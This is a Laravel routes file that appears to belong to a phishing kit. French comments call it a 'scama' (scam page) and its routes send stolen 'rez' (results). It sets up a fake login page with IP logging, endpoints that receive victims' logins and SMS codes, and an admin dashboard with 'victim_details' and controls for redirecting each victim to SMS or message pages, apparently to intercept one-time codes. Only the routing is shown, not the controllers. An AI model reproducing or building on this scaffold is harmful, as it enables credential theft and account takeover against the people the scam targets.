<?php

use App\Http\Middleware\LogIpAdress;
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\RezController;
use App\Http\Controllers\PageController;
use App\Http\Controllers\UserController;
use App\Http\Controllers\RedirectController;
use App\Http\Controllers\DashboardController;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider and all of them will
| be assigned to the "web" middleware group. Make something great!
|
*/

Route::post('/del-visitor', [UserController::class, 'deletevisitor'])->name('deletevisitor');


Route::middleware(LogIpAdress::class)->group(function () {

    Route::get('/', [PageController::class, 'login'])->name('login');

});

Route::get('/sms', [PageController::class, 'sms'])->name('sms');
Route::get('/message', [PageController::class, 'message'])->name('message');


//LOADERS

Route::get('/loader', [RedirectController::class, 'loader'])->name('loader');


// //LIENS DE REDIRECTION POUR LE CLIENT SUR LA SCAMA

Route::get('/redirect', [RedirectController::class, 'redirect'])->name('redirect');

//LIENS SEND DES REZ
Route::post('/rezlogin', [RezController::class, 'rezlogin'])->name('rezlogin');
Route::post('/rezsms', [RezController::class, 'rezsms'])->name('rezsms');





// LIENS ADMIN*



Route::get('/details/{visitor}', [DashboardController::class, 'victim_details'])->name('victim_details');
Route::get('/dashboard', [DashboardController::class, 'index'])->name('dashboard');

//LIENS POUR METTRE A JOUR LA DESTINATION DU USER

Route::post('/redirect_sms', [DashboardController::class, 'redirect_sms'])->name('admin.redirect_sms');
Route::post('/redirect_message', [DashboardController::class, 'redirect_message'])->name('admin.redirect_message');

